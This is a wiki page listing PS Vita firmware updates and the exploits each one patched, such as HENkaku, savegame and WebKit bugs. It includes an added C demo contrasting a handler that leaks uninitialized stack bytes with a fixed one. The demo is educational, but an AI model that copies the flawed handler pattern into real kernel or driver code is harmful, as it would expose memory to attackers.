|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*The "no entry" sign icon has been changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the use of non-Asian PSN accounts on the PS TV if they are set up via a PS3 or a proxy, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* The [Import Saved Data] feature has been fixed after being broken by system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s page loading and its compatibility with HTML5/JavaScript content have been made. The HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher), which is available for download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*[near] no longer shows Maps and other map-related content.<br />
*PSN has been renamed to PlayStation Network.<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online status of friends is no longer shown in a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed a kernel-mode exploit in the PS Vita's PSP emulator that enabled the use of eCFWs.<br />
*Fixed the "custom bubble" exploit.<br />
*About 30% of the 256 MB of memory reserved for the operating system has been freed for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag that some users reported on the system's home screen.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile (PSM) support.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed a kernel-mode exploit in the PS Vita's PSP emulator that enabled the use of eCFWs.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed the <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed the WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed the <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed the PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed the Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed some bugs in SceNgs.<br />
*The SSL library has been updated (along with the other networking libraries that use SceSsl), and two new root certificates have been added.<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
*The encryption key ("enc key") was changed.<br />
*No other keys were changed.<br />
|-<br />
|}<br />
<br />
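The 3.61 and 3.63 entries above name their memory-safety bugs by class only (an uninitialized stack memory leak in <code>sceIoDevctl</code>, a WebKit array-sorting bug, and a use-after-free in <code>sceNetIoctl</code>); the page does not describe how any of them works or how Sony fixed them. The following is an added, constructed C example, not Vita kernel code and not from this wiki, showing the first class in general: a devctl-style handler that fills only part of a reply structure before copying the whole structure back to the caller, beside the fixed version that zeroes the reply first. The <code>struct dev_info</code> layout, the handler names and the fake stack arena are assumptions made purely for this illustration.<br />

```c
/*
 * Constructed illustration of the bug class the 3.61 entry names for
 * sceIoDevctl: an uninitialized-stack information leak. This is NOT the
 * Vita kernel code; struct dev_info, devctl_vuln(), devctl_fixed() and the
 * fake stack arena are assumptions made for this demonstration.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reply the handler returns to the caller. The handler only ever sets
 * `type` and `size`; `hole` and `reserved` are never written. */
struct dev_info {
    uint16_t type;
    uint8_t  hole[6];      /* alignment hole, never written by the handler */
    uint64_t size;
    uint8_t  reserved[8];  /* reserved field, never written by the handler */
};

/* Deterministic stand-in for a kernel stack frame. Reading genuinely
 * indeterminate stack memory is undefined behaviour in C, so the demo
 * models the stale frame explicitly instead. */
static uint8_t kstack[64];

/* A previous kernel call leaves sensitive material (here a fake kernel
 * pointer string) in the frame that the devctl handler will reuse. */
static void earlier_call_leaves_secret(void) {
    static const char secret[] = "KERNEL-PTR-0x81234567!!";
    memset(kstack, 0xCC, sizeof kstack);
    memcpy(kstack + 8, secret, sizeof secret);
}

/* Vulnerable handler: the reply struct occupies the stale frame, only two
 * fields are filled, and the whole struct is copied to the caller. The
 * untouched bytes carry old kernel data into userland. */
static size_t devctl_vuln(uint8_t *user_out) {
    struct dev_info info;
    memcpy(&info, kstack, sizeof info);   /* models: local lands on stale bytes */
    info.type = 0x0001;
    info.size = 0x1000;
    memcpy(user_out, &info, sizeof info); /* models: copy to user */
    return sizeof info;
}

/* Fixed handler: zero the whole reply before filling it, so no byte the
 * handler did not explicitly set can reach the caller. */
static size_t devctl_fixed(uint8_t *user_out) {
    struct dev_info info;
    memset(&info, 0, sizeof info);
    info.type = 0x0001;
    info.size = 0x1000;
    memcpy(user_out, &info, sizeof info);
    return sizeof info;
}

/* Count non-zero bytes in the parts of the reply the handler never set.
 * Any such byte is leaked stale stack content. */
static int count_leaked_bytes(const uint8_t *reply) {
    int leaked = 0;
    for (size_t i = offsetof(struct dev_info, hole); i < offsetof(struct dev_info, size); i++)
        leaked += reply[i] != 0;
    for (size_t i = offsetof(struct dev_info, reserved); i < sizeof(struct dev_info); i++)
        leaked += reply[i] != 0;
    return leaked;
}

/* Run one handler against a frame that holds a secret; return how many
 * bytes of that frame it disclosed to the caller. */
static int leaked_bytes(size_t (*handler)(uint8_t *)) {
    uint8_t reply[sizeof(struct dev_info)];
    earlier_call_leaves_secret();
    handler(reply);
    return count_leaked_bytes(reply);
}

int main(void) {
    printf("vulnerable handler leaked %d byte(s)\n", leaked_bytes(devctl_vuln));
    printf("fixed handler leaked     %d byte(s)\n", leaked_bytes(devctl_fixed));
    return 0;
}
```

Compiled with any C99/C11 compiler, the vulnerable handler reports 14 leaked bytes (six from the alignment hole, eight from the reserved field) and the fixed handler reports none. The number is specific to this constructed frame; the general rule when auditing a syscall, ioctl or devctl surface is that every structure crossing the kernel/user boundary must be fully initialised before the copy, since compilers do not zero padding or skipped fields for you.<br />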
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=9108System Software2018-12-01T23:57:47Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixes problems that appeared in 1.65.<br />
* [Settings]<br />
** The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and many other vulnerabilities.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
* [Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>10 April 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
